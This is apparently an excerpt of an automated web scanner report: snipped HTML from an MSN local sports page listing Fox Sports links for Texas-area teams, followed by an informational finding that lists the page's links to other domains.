<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86127" title="Baylor Bears"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/79.png" alt="Baylor Bears logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86127">Baylor Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Canadian-jumps-from-fire-to-pro-football-88154560">Canadian jumps from fire to pro football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Leshoure-leads-Illinois-past-Baylor-in-Texas-Bowl-67062026">Leshoure leads Illinois past Baylor in Texas Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Illinois-beats-Baylor-for-rare-bowl-win-122910">Illinois finally tastes bowl victory</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Bears-make-first-bowl-appearance-since-1994-47130273">Bears make first bowl appearance since 1994</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86127">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86127">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/houston-rockets" title="Houston Rockets"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/10.png" alt="Houston Rockets logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/houston-rockets">Houston Rockets</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/San-Antonio-Spurs-top-Houston-Rockets-012911">Spurs top Rockets, first to 40 wins</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/RocketsSpurs-Preview-80260514">Rockets-Spurs Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Dallas-Mavericks-beat-Houston-Rockets-NBA-012711">Mavericks win fourth in five games</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/RocketsMavericks-Preview-22944154">Rockets-Mavericks Preview</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/houston-rockets/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/houston-rockets/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks" title="Dallas Mavericks"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/6.png" alt="Dallas Mavericks logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/dallas-mavericks">Dallas Mavericks</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/Dallas-Mavericks-take-down-Atlanta-Hawks--12911">Mavericks stay hot, topple Hawks</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/HawksMavericks-Preview-77679106">Hawks-Mavericks Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Dallas-Mavericks-beat-Houston-Rockets-NBA-012711">Mavericks win fourth in five games</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/RocketsMavericks-Preview-22944154">Rockets-Mavericks Preview</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs" title="San Antonio Spurs"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/24.png" alt="San Antonio Spurs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs">San Antonio Spurs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/San-Antonio-Spurs-top-Houston-Rockets-012911">Spurs top Rockets, first to 40 wins</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Weighing-Ws-and-Ls-vs-numbers-in-AllStar-votes-33069128">Weighing W's and L's vs numbers in All-Star votes</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/RocketsSpurs-Preview-80260514">Rockets-Spurs Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/Spurs-hand-Jazz-6th-straight-loss-012611">Spurs hand Jazz 6th straight loss</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71871" title="Baylor Bears"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/50.gif" alt="Baylor Bears logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71871">Baylor Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175">Baylor 70, Colorado 66</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Jimmermania-highlights-seasons-top-performances-13336281">Jimmermania highlights season's top performances</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Oneanddone-6plus-players-who-might-leave-quick-78004338">One-and-done? 6-plus players who might leave quick</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Kansas-St-69-Baylor-61-11058486">Kansas St. 69, Baylor 61</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71871">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71871">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71650" title="North Texas Eagles"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/415.gif" alt="North Texas Eagles logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71650">North Texas Eagles</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Denver-80-North-Texas-67-66077993">Denver 80, North Texas 67</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/LouisianaLafayette-93-North-Texas-88-50545535">Louisiana-Lafayette 93, North Texas 88</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/LouisianaLafayette-defeats-North-Texas-9388-18092539">Louisiana-Lafayette defeats North Texas 93-88</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/North-Texas-83-Arkansas-St-64-96725786">North Texas 83, Arkansas St. 64</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71650">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71650">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71926" title="SMU Mustangs"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/515.gif" alt="SMU Mustangs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71926">SMU Mustangs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/SMU-75-Rice-68-35158885">SMU 75, Rice 68</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/SMU-59-Tulsa-58-81254706">SMU 59, Tulsa 58</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/SMU-79-Southern-Miss-65-96624346">SMU 79, Southern Miss. 65</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/UAB-67-SMU-53-71299212">UAB 67, SMU 53</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71926">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71926">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71780" title="Texas Arlington Mavericks"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/588.gif" alt="Texas Arlington Mavericks logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71780">Texas Arlington Mavericks</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/TexasArlington-83-Texas-St-66-30375558">Texas-Arlington 83, Texas St. 66</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/TexasArlington-62-Stephen-FAustin-52-85322240">Texas-Arlington 62, Stephen F.Austin 52</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/TexasArlington-70-Texas-AampMCorpus-Christi-49-49303869">Texas-Arlington 70, Texas A&amp,M-Corpus Christi 49</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Lamar-76-TexasArlington-72-22113261">Lamar 76, Texas-Arlington 72</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71780">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71780">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71874" title="Texas Longhorns"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/585.gif" alt="Texas Longhorns logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71874">Texas Longhorns</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Texas-Longhorns-topple-Missouri-Tigers-012911">No. 7 Texas drops No. 11 Missouri</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/MissouriTexas-Preview-94031904">Missouri-Texas Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Sadler-must-look-beyond-borders-for-future-Huskers-50872138">Sadler must look beyond borders for future Huskers</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Oneanddone-6plus-players-who-might-leave-quick-78004338">One-and-done? 6-plus players who might leave quick</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71874">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71874">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71872" title="Texas Tech Red Raiders"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/592.gif" alt="Texas Tech Red Raiders logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71872">Texas Tech Red Raiders</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Texas-Tech-75-Oklahoma-St-74-80642690">Texas Tech 75, Oklahoma St. 74</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Texas-Tech-92-Iowa-St-83-37630109">Texas Tech 92, Iowa St. 83</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Texas-Tech-72-Nebraska-71-91656634">Texas Tech 72, Nebraska 71</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Oklahoma-83-Texas-Tech-74-06947696">Oklahoma 83, Texas Tech 74</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71872">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71872">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71922" title="TCU Horned Frogs"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/576.gif" alt="TCU Horned Frogs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71922">TCU Horned Frogs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Air-Force-66-TCU-65-64413866">Air Force 66, TCU 65</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Utah-75-TCU-62-52354638">Utah 75, TCU 62</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/No-9-BYU-83-TCU-67-33157554">No. 9 BYU 83, TCU 67</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Colorado-St-79-TCU-69-99128904">Colorado St. 79, TCU 69</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71922">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71922">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="SMU Mustangs - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/515.gif" alt="SMU Mustangs - Women logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/wcbk">SMU Mustangs - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="TCU Horned Frogs - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/576.gif" alt="TCU Horned Frogs - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">TCU Horned Frogs - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/No-20-TCU-78-Colorado-St-51-34049731">No. 20 TCU 78, Colorado St. 51</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/No-23-TCU-81-UNLV-61-58963977">No. 23 TCU 81, UNLV 61</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/No-22-TCU-80-San-Diego-St-63-56753002">No. 22 TCU 80, San Diego St. 63</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Wyoming-73-No-22-TCU-67-02071027">Wyoming 73, No. 22 TCU 67</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Texas Longhorns - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/585.gif" alt="Texas Longhorns - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Texas Longhorns - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/National-Team-Leaders3">National Team Leaders</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/CONNECTICUT-370-61746829">CONNECTICUT (38-0)</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Nebraskas-Yori-chosen-AP-coach-of-the-year-90044251">Nebraska's Yori chosen AP coach of the year</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Baylor-Lady-Bears-Roster-34247840">Baylor Lady Bears Roster</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Texas Tech Red Raiders - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/592.gif" alt="Texas Tech Red Raiders - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Texas Tech Red Raiders - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/Womens-NCAA-Championship-Winningest-Coaches-87055644">Women's NCAA Championship Winningest Coaches</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Fewest-Points-in-One-Half-NCAA-Tournament-07292331">Fewest Points in One Half - NCAA Tournament</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Womens-NCAA-AllTournament-Teams-37687435">Women's NCAA All-Tournament Teams</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/OKLAHOMA-2710-68082171">OKLAHOMA (27-10)</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Baylor Bears - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/50.gif" alt="Baylor Bears - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Baylor Bears - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/National-Team-Leaders">National Team Leaders</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/NCAA-Womens-Final-Four-MVPs-25159731">NCAA Women's Final Four MVPs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/NCAA-Championship-Scores-81750110">NCAA Championship Scores</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Baylors-future-bright-for-Griner-young-Bears-60468229">Baylor's future bright for Griner, young Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba" title="San Antonio Silver Stars"><img src="http://msn.foxsports.com/fe/img/WNBA/TeamLogo/Large/8.gif" alt="San Antonio Silver Stars logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wnba">San Antonio Silver Stars</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wnba/story/Leuchanka-leads-Belarus-to-7053-upset-of-Russia-67166762">Leuchanka leads Belarus to 70-53 upset of Russia</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba/story/USA-aims-to-reclaim-gold-at-womens-hoops-worlds-21153241">USA aiming for gold at women's basketball worlds</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba/story/Mercury-92-Silver-Stars-73-19788864">Mercury 92, Silver Stars 73</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wnba/story/Silver-Stars-92%2C-Mercury-91">Phoenix tops San Antonio 92-73 in WNBA playoffs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wnba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wnba/stats">Stats</a></li><li><a href="http://msn.foxsports.com/wnba/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wnba">WNBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/team/houston-astros" title="Houston Astros"><img src="http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/18.gif" alt="Houston Astros logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/mlb/team/houston-astros">Houston Astros</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/story/Houston-Astros-reach-34M-3-year-deal-with-RHP-Wandy-Rodriguez-012511">Astros, Rodriguez reach 3-year deal</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Astros-pitcher-Carrillo-arrested-at-Fla-casino-03199288">Astros pitcher Carrillo arrested at Fla. casino</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Salary-Arbitration-Eligibles-List">Salary Arbitration Eligibles List</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/mlb/story/Astros-infielder-Keppinger-to-have-foot-surgery-48484608">Astros infielder Keppinger to have foot surgery</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/mlb/team/houston-astros/stats">Stats</a></li><li><a href="http://msn.foxsports.com/mlb/team/houston-astros/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/team/texas-rangers" title="Texas Rangers"><img src="http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/13.gif" alt="Texas Rangers logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/mlb/team/texas-rangers">Texas Rangers</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/story/Baltimore-Orioles-Vladimir-Guerrero-contract-offer-012911">Orioles hoping to add Guerrero</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Francicso-signs-oneyear-deal-with-Blue-Jays-27438403">Francicso signs one-year deal with Blue Jays</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420">Rangers, Napoli avoid arbitration with $5.8M deal</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/mlb/story/Padres-promote-Chris-Gwynn%2C-hire-Dave-Roberts">Padres reach deals with INF Cantu, RHP Burke</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/mlb/team/texas-rangers/stats">Stats</a></li><li><a href="http://msn.foxsports.com/mlb/team/texas-rangers/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377" title="FC Dallas"><img src="http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5357.gif" alt="FC Dallas logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">FC Dallas</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/foxsoccer/mls/standings">Standings</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">Stats</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/foxsoccer/mls">MLS</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382" title="Houston Dynamo"><img src="http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5726.gif" alt="Houston Dynamo logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Houston Dynamo</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/foxsoccer/mls/standings">Standings</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Stats</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/foxsoccer/mls">MLS</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/team/dallas-stars" title="Dallas Stars"><img src="http://msn.foxsports.com/fe/img/NHL/TeamLogo/Large/9.png" alt="Dallas Stars logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nhl/team/dallas-stars">Dallas Stars</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nhl/story/Alex-Ovechkin-Zdeno-Chara-shine-at-NHL-SuperSkills-012911">Ovechkin, Chara shine at NHL SuperSkills</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/story/Stars-3-Oilers-1-38835353">Stars 3, Oilers 1</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/story/Dallas-Stars-Jamie-Benn-Tom-Wandell-out-with-upper-body-injuries-012611">Stars' Benn, Wandell out</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nhl/story/OilersStars-Preview-96456130">Oilers-Stars Preview</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nhl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nhl/team/dallas-stars/stats/">Stats</a></li><li><a href="http://msn.foxsports.com/nhl/team/dallas-stars/schedule/">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP">2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=NFL Experience&p1=[Events+source="vertical"+qzeventid="f538503"]&form=MSNLAP">NFL Experience</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&p1=[Events+source="vertical"+qzeventid="z162393185"]&form=MSNLAP">2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&p1=[Events+source="vertical"+qzeventid="z157228725"]&form=MSNLAP">NFLX After Dark at The NFL Experience</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Everything's Bigger in Texas Party DUEX Super Celebrity Party&p1=[Events+source="vertical"+qzeventid="z155484965"]&form=MSNLAP">Everything's Bigger in Texas Party DUEX Super Celebrity Party</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=MhTrwKXH&resize=false">Feedback</a>
...[SNIP]...

22.126. http://local.redacted/sports.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/sports.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/sports.aspx?zip=75207&q=75207

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/cbk/standings
http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175
http://msn.foxsports.com/cbk/story/Colorado-St-79-TCU-69-99128904
http://msn.foxsports.com/cbk/story/Houston-70-SMU-68-53343248
http://msn.foxsports.com/cbk/story/Jimmermania-highlights-seasons-top-performances-13336281
http://msn.foxsports.com/cbk/story/Kansas-St-69-Baylor-61-11058486
http://msn.foxsports.com/cbk/story/Lamar-76-TexasArlington-72-22113261
http://msn.foxsports.com/cbk/story/LouisianaLafayette-93-North-Texas-88-50545535
http://msn.foxsports.com/cbk/story/LouisianaLafayette-defeats-North-Texas-9388-18092539
http://msn.foxsports.com/cbk/story/MissouriTexas-Preview-94031904
http://msn.foxsports.com/cbk/story/No-21-Kansas-St-94-Texas-Tech-60-93343325
http://msn.foxsports.com/cbk/story/No-9-BYU-83-TCU-67-33157554
http://msn.foxsports.com/cbk/story/North-Texas-79-LouisianaMonroe-62-59041039
http://msn.foxsports.com/cbk/story/North-Texas-83-Arkansas-St-64-96725786
